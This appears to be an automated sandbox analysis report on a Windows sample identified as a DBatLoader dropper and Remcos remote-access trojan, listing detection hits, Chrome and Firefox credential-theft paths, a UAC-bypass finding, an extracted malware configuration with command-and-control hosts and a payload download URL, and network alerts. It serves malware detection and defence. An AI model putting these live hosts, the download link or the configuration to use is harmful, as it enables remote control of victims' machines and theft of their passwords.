Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2349013309.000000001B1D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2170737614.000000007EAA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491250282.0000000000540000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2150744964.0000000002A47000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2240779632.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491250282.0000000000528000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: D2pQ4J4GGZ.exe PID: 6804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 5804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 2964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 6608, type: MEMORYSTR

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data	8_2_027CBA4D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data	11_2_027CBA4D
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data	13_2_0280BA4D

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	8_2_027CBB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \key3.db	8_2_027CBB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	11_2_027CBB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \key3.db	11_2_027CBB6B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	13_2_0280BB6B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: \key3.db	13_2_0280BB6B

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\SysWOW64\colorcpl.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-X0H4I6	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-X0H4I6	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-X0H4I6	Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2349013309.000000001B1D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2170737614.000000007EAA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491250282.0000000000540000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2150744964.0000000002A47000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2240779632.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491250282.0000000000528000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: D2pQ4J4GGZ.exe PID: 6804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 5804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 2964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 6608, type: MEMORYSTR

Contains functionality to launch a control a shell (cmd.exe)

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: cmd.exe	8_2_027C569A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: cmd.exe	11_2_027C569A
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: cmd.exe	13_2_0280569A

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
3.5.29.78	s3-w.us-east-1.amazonaws.com	United States	14618	AMAZON-AESUS	false
185.166.143.49	bitbucket.org	Germany	16509	AMAZON-02US	false
192.169.69.26	idearo24.duckdns.org	United States	23033	WOWUS	true

Contacted Domains

Name	IP	Active
s3-w.us-east-1.amazonaws.com	3.5.29.78	true
bitbucket.org	185.166.143.49	true
idearo24.duckdns.org	192.169.69.26	true
morewins.duckdns.org	192.169.69.26	true
bbuseruploads.s3.amazonaws.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
idearo24.duckdns.org	true	Avira URL Cloud: safe	unknown
morewins.duckdns.org	true	Avira URL Cloud: safe	unknown
https://bitbucket.org/ntim1478/gpmaw/downloads/250_Vjrsafyhidj	false		high

AV Detection

Antivirus / Scanner detection for submitted sample

Source: D2pQ4J4GGZ.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\Public\Libraries\Vjrsafyh.PIF

Avira: detection malicious, Label: HEUR/AGEN.1325882

Found malware configuration

Source: D2pQ4J4GGZ.exe	Malware Configuration Extractor: DBatLoader {"Download Url": ["https://bitbucket.org/ntim1478/gpmaw/downloads/250_Vjrsafyhidj"]}
Source: 0000000D.00000002.2349013309.000000001B1D7000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: Remcos {"Host:Port:Password": ["idearo24.duckdns.org:2404:0", "morewins.duckdns.org:2500:0"], "Assigned name": "i-must-win", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-X0H4I6", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Vjrsafyh.PIF

ReversingLabs: Detection: 60%

Multi AV Scanner detection for submitted file

Source: D2pQ4J4GGZ.exe	ReversingLabs: Detection: 60%
Source: D2pQ4J4GGZ.exe	Virustotal: Detection: 71%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2349013309.000000001B1D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2170737614.000000007EAA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491250282.0000000000540000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2150744964.0000000002A47000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2240779632.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491250282.0000000000528000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: D2pQ4J4GGZ.exe PID: 6804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 5804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 2964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 6608, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027F38C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	8_2_027F38C8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027F38C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	11_2_027F38C8
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_028338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	13_2_028338C8

Source: D2pQ4J4GGZ.exe

Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2170737614.000000007EAA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2150744964.0000000002A47000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: D2pQ4J4GGZ.exe PID: 6804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 5804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 2964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 6608, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027C7538 _wcslen,CoGetObject,	8_2_027C7538
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027C7538 _wcslen,CoGetObject,	11_2_027C7538
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02807538 _wcslen,CoGetObject,	13_2_02807538

Uses 32bit PE files

Source: D2pQ4J4GGZ.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.29.78:443 -> 192.168.2.5:49706 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: D2pQ4J4GGZ.exe, D2pQ4J4GGZ.exe, 00000000.00000002.2150540153.00000000029EE000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020717000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2032389922.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020700000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.00000000206D0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2031234000.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000004.00000003.2123647740.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.4.dr
Source:	Binary string: ping.pdbGCTL source: esentutl.exe, 00000005.00000003.2129503162.0000000005620000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.5.dr
Source:	Binary string: easinvoker.pdbH source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: D2pQ4J4GGZ.exe, 00000000.00000003.2032127390.000000000249D000.00000004.00000020.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2150540153.00000000029EE000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020717000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2130066315.000000002180D000.00000004.00000020.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2032389922.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020700000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.00000000206D0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2031234000.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2130066315.000000002183E000.00000004.00000020.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2149724742.00000000024A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: esentutl.exe, 00000004.00000003.2123647740.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.4.dr
Source:	Binary string: ping.pdb source: esentutl.exe, 00000005.00000003.2129503162.0000000005620000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.5.dr

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029C5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	0_2_029C5908
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027C928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	8_2_027C928E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027DC322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	8_2_027DC322
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027CC388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	8_2_027CC388
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027C96A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	8_2_027C96A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027CBB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	8_2_027CBB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027D9B86 FindFirstFileW,FindNextFileW,FindNextFileW,	8_2_027D9B86
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027C7877 FindFirstFileW,FindNextFileW,	8_2_027C7877
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027C8847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	8_2_027C8847
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_0280E8F9 FindFirstFileExA,	8_2_0280E8F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027CBD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	8_2_027CBD72
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027C928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_027C928E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027DC322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	11_2_027DC322
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027CC388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	11_2_027CC388
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027C96A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_027C96A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027CBB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	11_2_027CBB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027D9B86 FindFirstFileW,FindNextFileW,FindNextFileW,	11_2_027D9B86
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027C7877 FindFirstFileW,FindNextFileW,	11_2_027C7877
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027C8847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	11_2_027C8847
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0280E8F9 FindFirstFileExA,	11_2_0280E8F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027CBD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	11_2_027CBD72
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0280928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	13_2_0280928E
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0280C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	13_2_0280C388
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0281C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	13_2_0281C322
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_028096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	13_2_028096A0
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02819B86 FindFirstFileW,FindNextFileW,FindNextFileW,	13_2_02819B86
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0280BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	13_2_0280BB6B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0284E8F9 FindFirstFileExA,	13_2_0284E8F9
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02808847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	13_2_02808847
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02807877 FindFirstFileW,FindNextFileW,	13_2_02807877
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0280BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	13_2_0280BD72

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027C7CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

8_2_027C7CD2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49716 -> 192.169.69.26:2500
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49796 -> 192.169.69.26:2404
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49745 -> 192.169.69.26:2404
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49821 -> 192.169.69.26:2500
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49707 -> 192.169.69.26:2404
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49769 -> 192.169.69.26:2500
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49900 -> 192.169.69.26:2404
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49874 -> 192.169.69.26:2500
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49998 -> 192.169.69.26:2500
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49993 -> 192.169.69.26:2404
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49994 -> 192.169.69.26:2500
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50000 -> 192.169.69.26:2500
